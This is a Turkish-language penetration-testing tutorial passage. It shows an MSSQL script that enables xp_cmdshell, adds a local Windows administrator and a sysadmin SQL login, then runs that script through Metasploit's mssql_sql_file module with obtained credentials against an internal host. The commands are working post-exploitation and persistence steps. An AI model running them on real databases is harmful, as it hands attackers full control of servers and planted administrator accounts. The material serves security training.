MSSQL veritabanında xp_cmdshell konfigürasyonunu etkinleştiren, işletim sistemi üzerinde yeni bir yerel yönetici ve veritabanı üzerinde “sysadmin” rolünde yeni bir veritabanı kullanıcısı oluşturan bir betik aşağıdaki gibidir.
EXECUTE sp_configure ‘show advanced options’, 1; RECONFIGURE WITH OVERRIDE;
EXECUTE sp_configure ‘xp_cmdshell’, 1; RECONFIGURE WITH OVERRIDE;EXECUTE (‘master.sys.xp_cmdshell ”net user YerelYonetici Yy123456 /add” ‘);
EXECUTE (‘master.sys.xp_cmdshell ”net localgroup Administrators YerelYonetici /add” ‘);Create Login UygulamaYoneticisi with password = ‘Uu123456’;
EXEC sp_addsrvrolemember @loginame = UygulamaYoneticisi, @rolename = sysadmin
Kurum ağında 10.20.30.72 IP adresindeki MS SQL veritabanına ait erişim bilgileri, “Test/Tt123456” olarak elde edilmiş olsun. Bu kullanıcının hakları ile, veritabanında betik dosyasındaki SQL sorgularını çalıştırmak için MSF mssql_sql_file modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.
search mssql_sql_file
use auxiliary/admin/mssql/mssql_sql_file
show options
Modüle IP adresi, erişim için gerekli kimlik bilgisi verilerek modül seçenekleri ayarlanabilir.
set RHOST 10.20.30.72
set USERNAME Test
set PASSWORD Tt123456
set SQL_FILE /root/Desktop/SqlBetik.txt
show options
Seçenekler ayarlandırıldıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında modüle parametre olarak verilen kullanıcı hakları ile belirtilen SQL dosyasındaki komutlar çalıştırılır.
run